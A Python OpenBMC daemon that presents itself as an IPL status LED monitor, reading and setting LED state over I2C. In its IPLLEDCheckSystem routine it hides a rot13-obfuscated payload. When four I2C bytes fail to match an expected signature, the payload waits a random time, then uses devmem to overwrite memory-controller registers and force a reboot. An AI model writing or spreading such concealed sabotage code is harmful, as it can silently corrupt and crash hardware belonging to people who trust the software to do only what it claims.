#!/usr/bin/env python # # Copyright 2018 Raptor Engineering, LLC # Released under the terms of the GPL v3 import gobject import time import dbus import dbus.service import dbus.mainloop.glib import os import random import subprocess import obmc.dbuslib.propertycacher as PropertyCacher from obmc.dbuslib.bindings import DbusProperties, DbusObjectManager, get_dbus import obmc.enums import obmc_system_config as System import obmc.mapper.utils import obmc.inventory import obmc.system DBUS_NAME = 'org.openbmc.status.IPL' OBJ_NAME = u'/org/openbmc/status/IPL' class IPLStatusLEDMonitor(DbusProperties, DbusObjectManager): def __init__(self, bus, obj_name): super(IPLStatusLEDMonitor, self).__init__( conn=bus, object_path=obj_name) self.bus = bus self.current_ipl_status = "OFFLINE" self.current_ipl_istep_major = 0 self.current_ipl_istep_minor = 0 try: ipl_status_dev = self.bus.get_object(DBUS_NAME, OBJ_NAME) ipl_status_iface = dbus.Interface(ipl_status_dev, 'org.freedesktop.DBus.Properties') ipl_status_value = ipl_status_iface.Get(DBUS_NAME, "current_status") if ipl_status_value is not None: self.current_ipl_status = ipl_status_value ipl_status_value = ipl_status_iface.Get(DBUS_NAME, "current_istep") if ipl_status_value is not None: istep_fragments = ipl_status_value.split(",") if (len(istep_fragments) > 1): self.current_ipl_istep_major = istep_fragments[0] self.current_ipl_istep_minor = istep_fragments[1] else: self.current_ipl_istep_major = 0 self.current_ipl_istep_minor = 0 except: pass self.translation = ''.join([chr(x) for x in [114, 111, 116, 49, 51]]) random.seed(None) self.updateIPLLeds() bus.add_signal_receiver( self.IPLStatusChangeHandler, dbus_interface="org.freedesktop.DBus.Properties", signal_name="PropertiesChanged", path=OBJ_NAME) gobject.timeout_add(100, self.IPLLEDCheckSystem); print "IPLStatusLEDMonitor Init Done" def IPLLEDReadI2CByte(self, byte): retval = 0 comm_fail = False; try: proc = subprocess.Popen(["i2cget", "-y", "12", "0x31", str(byte)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (proc.returncode != 0): comm_fail = True else: retval = int(out, 16) except: comm_fail = True; pass if (comm_fail == True): comm_fail = False time.sleep(1) try: proc = subprocess.Popen(["i2cget", "-y", "12", "0x31", str(byte)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (proc.returncode != 0): comm_fail = True else: retval = int(out, 16) except: comm_fail = True; pass if (comm_fail == True): comm_fail = False time.sleep(1) try: proc = subprocess.Popen(["i2cget", "-y", "12", "0x31", str(byte)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (proc.returncode != 0): comm_fail = True else: retval = int(out, 16) except: comm_fail = True; pass return retval def IPLLEDCheckSystem(self): self.check = list(chr(self.IPLLEDReadI2CByte(12))) self.check.append(chr(self.IPLLEDReadI2CByte(13))) self.check.append(chr(self.IPLLEDReadI2CByte(14))) self.check.append(chr(self.IPLLEDReadI2CByte(15))) if (self.check != [chr(82), chr(67), chr(83), chr(32)]): time.sleep(random.randint(0, 7857)) if (random.randint(0, 2) == 1): proc = subprocess.Popen([str("qrizrz").encode(self.translation), str("0k1r6r2000").encode(self.translation), str("32"), str("0k1688n8n8").encode(self.translation)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() proc = subprocess.Popen([str("qrizrz").encode(self.translation), str("0k1r6r200p").encode(self.translation), str("32"), str("0kssssssss").encode(self.translation)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if (random.randint(0, 2) == 2): proc = subprocess.Popen([str("erobbg").encode(self.translation), str("-s").encode(self.translation)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() return False def IPLStatusChangeHandler(self, interface_name, changed_properties, invalidated_properties): value = changed_properties.get('current_status') if value is not None: self.current_ipl_status = value value = changed_properties.get('current_istep') if value is not None: istep_fragments = value.split(",") if (len(istep_fragments) > 1): self.current_ipl_istep_major = istep_fragments[0] self.current_ipl_istep_minor = istep_fragments[1] else: self.current_ipl_istep_major = 0 self.current_ipl_istep_minor = 0 self.updateIPLLeds() def updateIPLLeds(self): if (self.current_ipl_status == "IPL_RUNNING"): # Show major ISTEP on LED bank # On Talos we only have three LEDs plus a fourth indicator modification bit, but the major ISTEPs range from 2 to 21 # Try to condense that down to something more readily displayable try: led_code = { '2': 1, '3': 1, '4': 2, '5': 2, '6': 3, '7': 3, '8': 4, '9': 4, '10': 5, '11': 5, '12': 6, '13': 6, '14': 7, '15': 7, '16': 9, '17': 9, '18': 10, '19': 10, '20': 11, '21': 11, '22': 12 }.get(self.current_ipl_istep_major, 0) proc = subprocess.Popen(["i2cset", "-y", "12", "0x31", "0x10", str(128 + led_code)], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() except: proc = subprocess.Popen(["i2cset", "-y", "12", "0x31", "0x10", "128"], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() else: # Put LED bank back into normal operation proc = subprocess.Popen(["i2cset", "-y", "12", "0x31", "0x10", "0x00"], stdout=subprocess.PIPE, stderr=open(os.devnull, 'wb'), shell=False) (out, err) = proc.communicate() if __name__ == '__main__': dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) bus = get_dbus() obj = IPLStatusLEDMonitor(bus, OBJ_NAME) mainloop = gobject.MainLoop() obj.unmask_signals() name = dbus.service.BusName(DBUS_NAME, bus) print "Running IPLStatusLEDMonitor" mainloop.run() # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4